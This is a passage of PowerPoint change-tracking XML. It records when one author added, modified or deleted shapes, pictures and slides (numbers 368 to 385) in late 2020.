          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T20:58:24.759" v="2100" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3682989002" sldId="368"/>
            <ac:spMk id="3" creationId="{DF78EE23-F081-43C1-8E3F-7890BC4EE623}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T20:59:07.743" v="2175" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3682989002" sldId="368"/>
            <ac:spMk id="4" creationId="{2A96615A-D77B-4534-B6D5-12294D36EEB9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod addAnim delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T21:09:04.951" v="10229"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="713279862" sldId="369"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T21:40:14.947" v="2274" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="713279862" sldId="369"/>
            <ac:spMk id="4" creationId="{FBABB386-7BF6-47C5-97F8-3D7C01FBD2A4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T21:43:49.490" v="2292" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="713279862" sldId="369"/>
            <ac:picMk id="2" creationId="{DC37AFFD-9C71-450F-8E35-27E6D6CE0195}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T21:43:50.601" v="2294" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="713279862" sldId="369"/>
            <ac:picMk id="3" creationId="{2C40FBE5-531E-4CCA-8151-2127580FD813}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T21:09:20.979" v="10231"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="773103033" sldId="370"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T21:44:39.792" v="2303" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="773103033" sldId="370"/>
            <ac:spMk id="6" creationId="{4A2DA472-30CD-4E03-94BB-B2F005D09B1A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T21:45:17.200" v="2379" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="773103033" sldId="370"/>
            <ac:spMk id="7" creationId="{E95B22B3-3EE9-41F5-8EF4-666BA0FE79DE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T21:43:57.712" v="2298" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="773103033" sldId="370"/>
            <ac:picMk id="2" creationId="{28CC6BE9-2E11-43CB-83A5-0CB80E5ED25B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T21:43:23.393" v="2284" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="773103033" sldId="370"/>
            <ac:picMk id="3" creationId="{46188838-AE23-451D-9596-418EA0D20D97}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T21:44:01.663" v="2300" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="773103033" sldId="370"/>
            <ac:picMk id="4" creationId="{140D6270-108C-4BD9-AE3D-6E39B01C5418}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T22:10:26.296" v="2724" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="828652044" sldId="371"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord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2" creationId="{9638DFF6-9ABA-4A58-BF3B-1F388E1B4B33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del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3" creationId="{C1BA3D36-6A4B-47F8-8E75-9D59D9936C6E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T22:10:17.424" v="2721" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="828652044" sldId="371"/>
            <ac:picMk id="4" creationId="{104D85DF-C13B-4C32-806C-68FF784CFEC4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T22:10:26.296" v="2724" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="828652044" sldId="371"/>
            <ac:picMk id="5" creationId="{3E54C46D-56AB-4CF5-BA9C-1BB727BF4981}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:09.291" v="8214" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1719230595" sldId="372"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-26T22:10:41.259" v="2726" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1719230595" sldId="372"/>
            <ac:spMk id="2" creationId="{007C68C5-306B-48F7-9BCF-945A312F4344}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:08:01.493" v="6221" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1719230595" sldId="372"/>
            <ac:spMk id="5" creationId="{ABF3C057-FE5C-4683-9E68-018B7C39D0EB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T18:12:09.291" v="8214" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1719230595" sldId="372"/>
            <ac:graphicFrameMk id="4" creationId="{F4DD9397-F236-46DB-BC99-76B2C47C11B2}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:04:01.896" v="7202" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3376229237" sldId="373"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:40:30.491" v="4033" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3376229237" sldId="373"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:38:10.402" v="3996" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3376229237" sldId="373"/>
            <ac:graphicFrameMk id="2" creationId="{93BAD9FF-0A4F-453F-B291-DD75F1AEB398}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-23T15:31:29.938" v="11265" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2921772423" sldId="374"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:09:36.962" v="3935"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2921772423" sldId="374"/>
            <ac:picMk id="2" creationId="{AE3BF90C-63CC-4F8E-A0B3-4612F6768094}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:10:44.856" v="3937"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3948782123" sldId="375"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:10:44.856" v="3937"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3948782123" sldId="375"/>
            <ac:picMk id="2" creationId="{FC1C644E-9ABC-41C0-91DF-0C9DE91778BE}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-23T15:31:29.760" v="11264" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="266199474" sldId="376"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:11:26.327" v="3939"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="266199474" sldId="376"/>
            <ac:picMk id="2" creationId="{AE86325E-F05E-4B27-834C-D1C23A3B345E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new del mod modShow modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:01:06.298" v="10527" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1997786756" sldId="377"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:35:45.219" v="3955" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1997786756" sldId="377"/>
            <ac:spMk id="2" creationId="{69884D88-76C5-4472-83C1-22E67C73AFF3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:23:30.087" v="6532" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1997786756" sldId="377"/>
            <ac:spMk id="3" creationId="{EC324661-8184-49C1-967B-3F931AEA285E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:17:00.675" v="6345" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1997786756" sldId="377"/>
            <ac:spMk id="5" creationId="{454E9509-233B-400C-BF67-0D85E0734792}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod setBg modAnim modShow">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:07:37.654" v="10707" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1896242820" sldId="378"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:38:25.621" v="4014" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1896242820" sldId="378"/>
            <ac:spMk id="2" creationId="{5A7D2443-D71C-4224-A6D2-2997F6374EE4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:07:37.654" v="10707" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1896242820" sldId="378"/>
            <ac:spMk id="3" creationId="{AE27958B-45DC-497F-9FD6-A98F1859E92D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:03:11.125" v="10623"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1896242820" sldId="378"/>
            <ac:spMk id="4" creationId="{37319885-6959-4210-94B3-E0305F5CF1DD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-12-10T19:14:24.814" v="11387" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2692560093" sldId="379"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:41:25.267" v="4063" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2692560093" sldId="379"/>
            <ac:spMk id="2" creationId="{F5989D6D-7140-41F2-9411-F3B7AD01EAB6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-12-10T19:13:54.312" v="11366" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2692560093" sldId="379"/>
            <ac:spMk id="3" creationId="{D515DC11-1567-4C09-A8AA-3CA5BBAC0ECE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:37:30.434" v="11007"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1173228883" sldId="380"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:59:56.443" v="4862" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173228883" sldId="380"/>
            <ac:spMk id="2" creationId="{26FC0A08-242C-4D9C-AD22-02DD47371E23}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:37:24.538" v="11006" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173228883" sldId="380"/>
            <ac:spMk id="3" creationId="{CFEA4607-FE9F-487B-A05E-5E3CDEAACDDA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:05:07.897" v="7208" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3394434897" sldId="381"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T22:05:07.897" v="7208" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3394434897" sldId="381"/>
            <ac:spMk id="4" creationId="{D0519423-E8F5-48FA-B003-DAD6B695BD87}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-22T22:49:05.601" v="11245"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3483357656" sldId="382"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T15:46:36.024" v="4932" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3483357656" sldId="382"/>
            <ac:picMk id="2" creationId="{F07A30B8-51AF-4074-8842-DD2D30FBB2E9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T15:46:37.728" v="4933" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3483357656" sldId="382"/>
            <ac:picMk id="3" creationId="{DB81917C-24D5-4B75-9852-B912CB8E3082}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T15:47:13.224" v="4935" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3483357656" sldId="382"/>
            <ac:picMk id="4" creationId="{3B7B134D-035E-44D9-9AFF-414F0193758F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T15:47:46.001" v="4937" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3483357656" sldId="382"/>
            <ac:picMk id="5" creationId="{45FEFBB3-5236-4AD1-8471-3F8CCD68B706}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:09:36.154" v="9119" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1731421883" sldId="383"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:09:32.599" v="9118" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731421883" sldId="383"/>
            <ac:spMk id="4" creationId="{8229D77C-4398-49BB-8434-A06845582E8F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T16:36:31.697" v="4959" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731421883" sldId="383"/>
            <ac:picMk id="2" creationId="{3571F0B9-5B8A-41C5-8786-827378E00903}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:09:36.154" v="9119" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731421883" sldId="383"/>
            <ac:picMk id="3" creationId="{3466217A-C3E2-44CB-8622-08459457D6FD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T21:09:26.324" v="9117" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731421883" sldId="383"/>
            <ac:picMk id="5" creationId="{1D22A58B-5671-4431-AE65-F5520B3B7944}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T16:52:21.695" v="5386" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2407528967" sldId="384"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-21T20:56:18.033" v="9088" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3362586493" sldId="385"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T16:40:00.105" v="5009" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3362586493" sldId="385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1-07T16:44:28.161" v="5372" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3362586493" sldId="385"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-07T16:40:41.894" v="5061" actId="478"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3362586493" sldId="385"/>
            <ac:graphicFrameMk id="2" creationId="{93BAD9FF-0A4F-453F-B291-DD75F1AEB398}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="add mod modCrop">
